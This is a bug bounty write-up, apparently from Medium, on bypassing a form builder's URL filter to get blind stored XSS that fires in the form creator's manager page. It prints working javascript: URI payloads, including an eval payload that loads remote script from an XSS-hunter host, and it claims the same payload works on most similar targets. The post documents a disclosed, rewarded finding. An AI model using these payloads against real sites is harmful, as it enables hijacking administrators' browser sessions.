Hack Your Form-New vector for Blind XSS

Youssef A. Mohamed
Mar 12, 2019 · 3 min read
Image for post
Image for post

Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG
Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack

Image for post
Image for post
  • Today I’m gonna share a juicy finding with you.

Talking about bypassing a couple of filters to execute malicious javascript codes easily and achieve a Blind Stored XSS.

“I found this issue in a lot of targets so, I will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently I was testing in this program and after some recon, I found that the website offers a specific service (Create Forms).

How does this service work?
1)Creator User create a form
2)Creator User share the link with visitor
3)Visitor fill the form
4)The filled information will be available for the Form’s Creator at redacted.com/manager/{Form ID}/

So while testing the “Creating form” functions, I’ve found that there’s a Website input

I made a simple form.

Image for post
Image for post

Then opened as the form as a visitor.

At the first I tried to bypass it as the basic style:
(thought that if I wrote website.com?” payload it will execute)

So, I entered:
https://example.com/?"%22"

( “ + url encoded + html entities encoded)

Then opened the creator account to see what happened.

But unfortunately, the filter encoded the double quotes.
https://example.com"%22"

and noticed that the Link rendered in (a tag)

Image for post
Image for post

So, I decided to grab a cup of coffee :”D

Image for post
Image for post
  • After a few minutes of deep thinking while drinking my coffee about how I will bypass this one.

I decided to start fuzzing in this input especially.. {Enter Website}

While I’m fuzzing I noticed that the filter accepted test:https://example.com !

Image for post
Image for post

then tried javascript:https//evil.com
and it worked :D
“Evil loud laugh”

Image for post
Image for post
  • Now I’m sure that there’s XSS here
    but it’s need real website merged with my payload so i wrote this one.

javascript:x=’http://x.c';alert('xss');//

Finally executed!

Image for post
Image for post
  • But wait we want to make it Blind XSS to attack the real admins (The best scenario).

So the last payload was:

javascript:eval(‘a=document.createElement(\’script\’);a.src=\’https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'

Image for post
Image for post

¯\_(ツ)_/¯

That’s it!

Notes:

  • 80% of my targets which have the Website’s input was vulnerable to the same scenario.
  • To make sure that your target is vulnerable to the same problem you need a few steps to make sure:

A. Check if the website is accepting other URI scheme like javascript:https://generaleg0x01.com or not?

B. Check if the website is rendering your https://generaleg0x01.com on HTML ‘a’ tag or not?

  • And in the most similar situations, the same payload will work perfectly.

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & 800$ Bounty Awarded

Learned lessons:

  • Fuzz as much as you can.
  • Don’t try one technique to bypass the filter to try other techniques.

Happy Hacking!

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store